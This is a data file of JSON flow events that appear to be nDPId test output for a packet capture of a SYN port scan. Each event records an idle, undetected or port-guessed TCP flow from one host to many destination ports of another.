+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":79,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056403,"flow_last_seen":1278275077676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
